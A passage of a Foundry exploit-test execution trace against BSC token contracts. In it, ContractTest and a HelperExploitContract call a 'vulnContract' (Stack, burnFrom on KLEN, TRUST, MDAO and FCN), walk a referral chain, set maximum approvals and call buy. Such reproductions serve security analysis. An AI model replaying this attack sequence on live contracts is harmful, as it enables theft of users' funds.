    │   │   ├─ emit Approval(owner: BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], approved: 0x0000000000000000000000000000000000000000, tokenId: 7690)
    │   │   ├─ emit Transfer(from: BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], tokenId: 7690)
    │   │   ├─  storage changes:
    │   │   │   @ 0x952cd7c7159726693c515b4fc958f751fdeb7b51c8ffeea9989afa35b5da78ca: 17 → 4
    │   │   │   @ 0x8b3f635c7f7dc11d4fb0932dcd417bc7e110275420696ca757b4d59499691309: 0x00000000000000000000000090bf82c772f16651d6ae51d42c90c84ae703eb42 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x429395017a52bb1dc38cb8266aa41981a987a1d952e1c19b73cb5d25357bef1e: 0 → 7690
    │   │   │   @ 0x631d37b7a370ff06d945ab4d5ed53af05028adaba702084ef99314fadfe23122: 17 → 16
    │   │   │   @ 0xc5fc80fd4c099c1b622d30fade61c6f02652ab4fea04a543b9299c9ca25cae69: 7690 → 7494
    │   │   │   @ 0x3ce1697acffd8acf164d8a96cce3bc8adacbb3ab4b5b865995a7a53327dfb3a3: 4 → 0
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 1
    │   │   │   @ 0xc5fc80fd4c099c1b622d30fade61c6f02652ab4fea04a543b9299c9ca25cae76: 7494 → 0
    │   │   │   @ 0xe4133863c16aae28d115151df8a14eff29898ad2f69b8f9b9a8331be78617e0b: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ emit buyEvent(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 7690)
    │   ├─  storage changes:
    │   │   @ 16: 1 → 0
    │   │   @ 0x560bd04c67154c764e06774f2cc9498e33fe4571e3300c48623431ed516b6be4: 0x000000000000000000000000d3ed11fab473b1b697d39b7e98da4ee9f180203f → 0
    │   │   @ 0x125730dabcd5c4123c535feef2021c937a91b5efdf847293e0da0942bdc3f691: 0x0000000000000000000000000000000000000000000000093739534d28680000 → 0
    │   │   @ 0x125730dabcd5c4123c535feef2021c937a91b5efdf847293e0da0942bdc3f692: 0x00000000000000000000000055d398326f99059ff775485246999027b3197955 → 0
    │   │   @ 0x9ec1e615b3e5607ff3a8cbfa96b4d186523eff2fccc4ec2c6aa5f134a0b8586f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffdb231ab2cb5e5ffff
    │   └─ ← [Stop]
    ├─ [70771] BindingContract::bindParent(addrToBind: [0x041285A02A7fabc448893f6c1766e4B592f46f96])
    │   ├─ emit BingParent(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : addrToBind: [0x041285A02A7fabc448893f6c1766e4B592f46f96])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000041285a02a7fabc448893f6c1766e4b592f46f96
    │   │   @ 0x215dbb65fd7ef5d70beb6de3b4cc673f9477113936eb503847a03c92a68df117: 0 → 1
    │   │   @ 0xb0587d24be98321d1139aeb42b139ea9c49fb8f46b68db21ac7329f6a97e5113: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   └─ ← [Stop]
    ├─ [44419] vulnContract::1f6b08a4(0000000000000000000000000000000000000000000000000000000000000001)
    │   ├─ [2362] 0xe39cdA8ca56589B0429B580b8f942bE6A936c4da::bbe6c24c() [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000024a32a033f08000
    │   ├─ [10950] KLEN::burnFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 303030303030303030303 [3.03e20])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039154553704882826609632 [1.157e77])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 303030303030303030303 [3.03e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000013d054d97f7d45fffff → 0x00000000000000000000000000000000000000000000012c97e9b0e2a82f83e0
    │   │   │   @ 0x3617319a054d772f909f7c479a2cebe5066e836a939412e32403c99029b92eff: 0x00000000000000000000000000000000000000000075dec2a2c2573e14abc678 → 0x00000000000000000000000000000000000000000075ded310263e5340dc4297
    │   │   │   @ 0x6d319970ff96b1ad6704a215240c34e0c29ec4d310f1177ff653a1f87c255dc2: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffef929c18ead3cf83e0
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─  storage changes:
    │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec1: 0 → 1
    │   └─ ← [Stop]
    ├─ [458441] vulnContract::Stack(200000000000000000000 [2e20])
    │   ├─ [727] 0x238f5426D18e117158dAf175Ad479c6180e88070::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [362] 0xe39cdA8ca56589B0429B580b8f942bE6A936c4da::bbe6c24c() [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000024a32a033f08000
    │   ├─ [2531] BUSDT::balanceOf(0xff77a0B56E45990cF39C2f9bA6bd630F76C395e3) [staticcall]
    │   │   └─ ← [Return] 498146142324551248481742 [4.981e23]
    │   ├─ [2626] TRUST::balanceOf(0xff77a0B56E45990cF39C2f9bA6bd630F76C395e3) [staticcall]
    │   │   └─ ← [Return] 1378983220331919441950 [1.378e21]
    │   ├─ [2626] TRUST::balanceOf(0x1889a1C801B523EBF9C885F22d6b81F149d222Da) [staticcall]
    │   │   └─ ← [Return] 4037621732736356690413 [4.037e21]
    │   ├─ [2648] MDAO::balanceOf(0x1889a1C801B523EBF9C885F22d6b81F149d222Da) [staticcall]
    │   │   └─ ← [Return] 56115775657011601778067785 [5.611e25]
    │   ├─ [2531] BUSDT::balanceOf(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10]) [staticcall]
    │   │   └─ ← [Return] 512963361056079475662703 [5.129e23]
    │   ├─ [2626] FCN::balanceOf(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10]) [staticcall]
    │   │   └─ ← [Return] 501971077397338362 [5.019e17]
    │   ├─ [6150] KLEN::burnFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 969696969696969696969 [9.696e20])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564038184856735185856912663 [1.157e77])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 969696969696969696969 [9.696e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000012c97e9b0e2a82f83e0 → 0x0000000000000000000000000000000000000000000000f806aa009ee7945d17
    │   │   │   @ 0x6d319970ff96b1ad6704a215240c34e0c29ec4d310f1177ff653a1f87c255dc2: 0xffffffffffffffffffffffffffffffffffffffffffffffef929c18ead3cf83e0 → 0xffffffffffffffffffffffffffffffffffffffffffffffbb015c68a713345d17
    │   │   │   @ 0x3617319a054d772f909f7c479a2cebe5066e836a939412e32403c99029b92eff: 0x00000000000000000000000000000000000000000075ded310263e5340dc4297 → 0x00000000000000000000000000000000000000000075df07a165ee9701776960
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ [10950] TRUST::burnFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 16609381502749691 [1.66e16])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457567398531626890244 [1.157e77])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 16609381502749691 [1.66e16])
    │   │   ├─  storage changes:
    │   │   │   @ 0x17ef568e3e12ab5b9c7254a8d58478811de00f9e6eb34345acd53bf8fd09d3ec: 0x0000000000000000000000000000000000000000000013500a561f8a0ca88bb3 → 0x0000000000000000000000000000000000000000000013500a9121af091197ae
    │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x000000000000000000000000000000000000000000000000064fa776b71b8703 → 0x0000000000000000000000000000000000000000000000000614a551bab27b08
    │   │   │   @ 0xbae3c283805a2362dea7d8182ad72853753ddaf0ba4e2149ee9eb52525ec38a1: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffc4fddb0396f404
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ [11005] MDAO::burnFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 76946974226034194305 [7.694e19])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039380637033687095445630 [1.157e77])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 76946974226034194305 [7.694e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x0000000000000000000000000000000000000000000000a5e207db6cd7502f98 → 0x0000000000000000000000000000000000000000000000a1b62d4a0c93683817
    │   │   │   @ 0x17ef568e3e12ab5b9c7254a8d58478811de00f9e6eb34345acd53bf8fd09d3ec: 0x000000000000000000000000000000000000000002fda8f6dafe7ec3480e586b → 0x000000000000000000000000000000000000000002fda8fb06d910238bf64fec
    │   │   │   @ 0x6d319970ff96b1ad6704a215240c34e0c29ec4d310f1177ff653a1f87c255dc2: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffbd4256e9fbc18087e
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ [11093] FCN::burnFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 31314272511869 [3.131e13])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457583976598857128066 [1.157e77])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 31314272511869 [3.131e13])
    │   │   ├─  storage changes:
    │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x0000000000000000000000000000000000000000000000000000accdd281e000 → 0x00000000000000000000000000000000000000000000000000009052e66af883
    │   │   │   @ 0x05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc: 0x000000000000000000000000000000000000000000000000045459787119beea → 0x000000000000000000000000000000000000000000000000045475f35d30a667
    │   │   │   @ 0xc8a03774798cfaf170723ca796ca9835c4fc30f2fcbfbe39ebf72471f435d053: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffe38513e91882
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ [557] BindingContract::getParent(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000041285a02a7fabc448893f6c1766e4b592f46f96
    │   ├─ [557] BindingContract::getParent(addrToBind: [0x041285A02A7fabc448893f6c1766e4B592f46f96]) [staticcall]
    │   │   └─ ← [Return] 0x00000000000000000000000092d922a6dc00ea06ac03a3f52ba7646db50dccdc
    │   ├─ [2557] BindingContract::getParent(0x92d922A6dc00Ea06ac03a3f52bA7646db50dccdc) [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000cecb91a9a60bb31e0d90f6151a4d0e98f834c4f5
    │   ├─ [2557] BindingContract::getParent(0xCecB91a9A60bb31e0d90f6151A4d0E98F834c4F5) [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000eb685017d672921e01b4008550e4bef371081b5b
    │   ├─ [2557] BindingContract::getParent(0xEb685017d672921E01B4008550e4BeF371081b5b) [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000fa3520750ff9ab1d4f21ffe2f414154d3ef61129
    │   ├─ [2557] BindingContract::getParent(0xfA3520750ff9Ab1d4F21FfE2F414154d3Ef61129) [staticcall]
    │   │   └─ ← [Return] 0x00000000000000000000000025346eff782be12c49451833a2460ba0da294b9c
    │   ├─ [2557] BindingContract::getParent(0x25346eFF782bE12c49451833a2460ba0dA294b9C) [staticcall]
    │   │   └─ ← [Return] 0x00000000000000000000000013be0c0cb2fa1d3ee90415d00379cc8ed84639eb
    │   ├─ [2557] BindingContract::getParent(0x13Be0C0cB2FA1D3eE90415d00379Cc8Ed84639eB) [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000641720e05728524251ad1afc5808d09bf882717
    │   ├─ [2557] BindingContract::getParent(0x0641720e05728524251AD1afC5808d09bF882717) [staticcall]
    │   │   └─ ← [Return] 0x00000000000000000000000090d3dc61b72769ea839963be697299f8924e5611
    │   ├─ [2557] BindingContract::getParent(0x90D3dC61b72769eA839963bE697299F8924E5611) [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000ba782d35df078953aff1f728099448e4dbc136c2
    │   ├─  storage changes:
    │   │   @ 0x493300507c8cd66cd8857f2e5e9e73d2b7a8486d2a1b88d4713d14b3ea200b31: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   │   @ 0x576f67f4b6785e4f2ea773f67178f466469ee7912fe98c865f5544cc79deccb6: 0x00000000000000000000000000000000000000000000000977a811461f4a924c → 0x00000000000000000000000000000000000000000000000963d4c320e704db71
    │   │   @ 0x6c6dcd4296f397ef776a916efcc608d1ef1a223f753cc1d015c09f625fede8d1: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   │   @ 0x9703f20ead428394de836e6ce71eb19517fb5f7a6ec4b8914f887b92d4e0ee0c: 0x000000000000000000000000000000000000000000000007e5335eec28f6924d → 0x000000000000000000000000000000000000000000000007d16010c6f0b0db72
    │   │   @ 0xa8a78e67add8e39c02f5f99631cd3c726753083bd258d093d40980bceaf25001: 0x0000000000000000000000000000000000000000000000093c2e26d676796db8 → 0x000000000000000000000000000000000000000000000009285ad8b13e33b6dd
    │   │   @ 13: 0x000000000000000000000000000000000000000000000fe840aa158529354b38 → 0x000000000000000000000000000000000000000000000ff1b35d5341fa6e6fce
    │   │   @ 0x3617319a054d772f909f7c479a2cebe5066e836a939412e32403c99029b92eff: 0x00000000000000000000000000000000000000000075ded310263e5340dc4297 → 0x00000000000000000000000000000000000000000075df07a165ee9701776960
    │   │   @ 0x53a178f7fed91c34c2962fc06872e11080a49f90a3d587b177ad41e00387a756: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   │   @ 0x9c11463ac32a10c8e5581ed06ce9369ade4d142283a6feefba561c814ffe5362: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   │   @ 0x8741faef3f1e8ca4fb40c79b0ffa2afe1fb84c8321f507b6c916d77a0be36175: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   │   @ 0xd0a1f927dfb07576fcb6b8c2a7ddaeb66b5b99a3bfd225c354672adba84522da: 0x0000000000000000000000000000000000000000000000096dbe6a338327b6dd → 0x00000000000000000000000000000000000000000000000959eb1c0e4ae20002
    │   │   @ 0x6264d4050170ce4ae5c84c6b1917bf824c321f6bda5a3c7d3f4ede193c11ad60: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   │   @ 0x9534681ec24b2f92b501f154ae52a7b0dfbe604d2df3596f69859e123d55d2f8: 0x000000000000000000000000000000000000000000000008611c0754c8aa4928 → 0x0000000000000000000000000000000000000000000000084d48b92f9064924d
    │   │   @ 0x62fb572b27d45301661a54684af060926f9d3887853f62b663346f1e5834f793: 0 → 0x00000000000000000000000000000000000000000000000053444835ec580000
    │   │   @ 0x17ef568e3e12ab5b9c7254a8d58478811de00f9e6eb34345acd53bf8fd09d3ec: 0x0000000000000000000000000000000000000000000013500a561f8a0ca88bb3 → 0x000000000000000000000000000000000000000002fda8fb06d910238bf64fec
    │   │   @ 0x4f5a23d656d88845ebf0bb13163beaa0ce63125bfb11a3a405371c97d2011ea5: 0x000000000000000000000000000000000000000000000014e8dc6b415986db6e → 0x000000000000000000000000000000000000000000000014ad6280d1b0b5b6dc
    │   │   @ 0x926271905aa45412c4040202dcdd587d868e0b1f1f152f51c5a23dabcb876c76: 0x0000000000000000000000000000000000000000000000098b7b5f6b57904927 → 0x00000000000000000000000000000000000000000000000977a811461f4a924c
    │   │   @ 0x3c7630272beb35d02a91180873f1218467a885ef8712f47af5ca3097315fd787: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 0 → 0x00000000000000000000000000000000000000000000000ad78ebc5ac6200000
    │   │   @ 0xc90be21bd2ed10ec8c7dd90917e20b9bea1d19e279416e761d10da6f626e3b51: 0x000000000000000000000000000000000000000000000015af1d78b58c400000 → 0x0000000000000000000000000000000000000000000000154bfcf1fb72e36db7
    │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x00000000000000000000000000000000000000000000000000000000657d87cc
    │   │   @ 0x76422804b3cc1576fccf44a7ae439a391fcffa3ea1105c530189b09c69d61d50: 0 → 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   @ 0xefd419ecbc1a23cbe605d77bd9c53b33df55090ed39c8f9d816ea273de7fe533: 0x000000000000000000000000000000000000000000000011bc04e74b565c924a → 0x000000000000000000000000000000000000000000000011808afcdbad8b6db8
    │   │   @ 0xf40c6a48f999abaf4dead46e53c33df57b1acd2945f7b1dc11614b812207eceb: 0x0000000000000000000000000000000000000000000000098191b858bb6d6db9 → 0x0000000000000000000000000000000000000000000000096dbe6a338327b6de
    │   │   @ 0xd93a2d09d8128bab455e84c1455d782ac6050c77be4894eca34d7f8ed7af1d05: 0 → 0x00000000000000000000000000000000000000000000000053444835ec580000
    │   └─ ← [Stop]
    ├─ [1680245] → new HelperExploitContract@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─  storage changes:
    │   │   @ 12: 0 → 1
    │   │   @ 31: 0 → 1
    │   └─ ← [Return] 8171 bytes of code
    ├─ [626] KLEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 4575272727272727272727 [4.575e21]
    ├─ [33653] KLEN::transfer(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 2287636363636363636363 [2.287e21])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 457527272727272727260 [4.575e20])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 1830109090909090909103 [1.83e21])
    │   ├─  storage changes:
    │   │   @ 0x3617319a054d772f909f7c479a2cebe5066e836a939412e32403c99029b92eff: 0x00000000000000000000000000000000000000000075df07a165ee9701776960 → 0x00000000000000000000000000000000000000000075df206edd550d4bd30c3c
    │   │   @ 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60: 0 → 0x00000000000000000000000000000000000000000000006335dd99d9296e8baf
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000f806aa009ee7945d17 → 0x00000000000000000000000000000000000000000000007c0355004f73ca2e8c
    │   └─ ← [Return] true
    ├─ [626] TRUST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 438156834204973832 [4.381e17]
    ├─ [32649] TRUST::transfer(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 219078417102486916 [2.19e17])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 219078417102486916 [2.19e17])
    │   ├─  storage changes:
    │   │   @ 0x407b49835a0660cb9d08bcabbbc30a7b3e9142e82d009d6a63d932db9d6b3349: 0 → 0x000000000000000000000000000000000000000000000000030a52a8dd593d84
    │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x0000000000000000000000000000000000000000000000000614a551bab27b08 → 0x000000000000000000000000000000000000000000000000030a52a8dd593d84
    │   └─ ← [Return] true
    ├─ [648] MDAO::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2983053025773965817879 [2.983e21]
    ├─ [35534] MDAO::transfer(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 1491526512886982908939 [1.491e21])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 298305302577396581787 [2.983e20])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 1193221210309586327152 [1.193e21])
    │   ├─  storage changes:
    │   │   @ 0x407b49835a0660cb9d08bcabbbc30a7b3e9142e82d009d6a63d932db9d6b3349: 0 → 0x000000000000000000000000000000000000000000000040af4550d1d4901670
    │   │   @ 0x17ef568e3e12ab5b9c7254a8d58478811de00f9e6eb34345acd53bf8fd09d3ec: 0x000000000000000000000000000000000000000002fda8fb06d910238bf64fec → 0x000000000000000000000000000000000000000002fda90b32aa6458011a5587
    │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x0000000000000000000000000000000000000000000000a1b62d4a0c93683817 → 0x000000000000000000000000000000000000000000000050db16a50649b41c0c
    │   └─ ← [Return] true
    ├─ [626] FCN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 158685727488131 [1.586e14]
    ├─ [38912] FCN::transfer(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 79342863744065 [7.934e13])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 79342863744065 [7.934e13])
    │   ├─  storage changes:
    │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x00000000000000000000000000000000000000000000000000009052e66af883 → 0x0000000000000000000000000000000000000000000000000000482973357c42
    │   │   @ 0xacc8d5563f021cfb27a25fbbb0722caca443d5aafeb4d4c3f298f463911d88c7: 0 → 0x0000000000000000000000000000000000000000000000000000482973357c41
    │   └─ ← [Return] true
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1010008559000000000000 [1.01e21]
    ├─ [25171] BUSDT::transfer(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 505004279500000000000 [5.05e20])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 505004279500000000000 [5.05e20])
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000036c0af3927e329f000 → 0x00000000000000000000000000000000000000000000001b60579c93f194f800
    │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0 → 0x00000000000000000000000000000000000000000000001b60579c93f194f800
    │   └─ ← [Return] true
    ├─ [559070] HelperExploitContract::exploit()
    │   ├─ [24643] KLEN::approve(vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xe69eadd5ea6d2b0b1040c3275b937de8f85b904c692c82f2bf962f808e122b15: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   ├─ [24643] TRUST::approve(vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x6faaf9a69445935c0c59ad310361f5121f9e0e3bed8be3a3350da75b3520ef65: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   ├─ [24643] MDAO::approve(vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xe69eadd5ea6d2b0b1040c3275b937de8f85b904c692c82f2bf962f808e122b15: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   ├─ [24643] FCN::approve(vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1cf8c119fd8254f448be2ed6596764f8a9633e4ede81ef5f7ec10f301bee835c: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   ├─ [24562] BUSDT::approve(BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x00e357a739949597d28bb83c9371f1860463866086942c1e9d93858a60c3ac49: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   ├─ [180360] BUSDT_MetaWin::buy(6069)
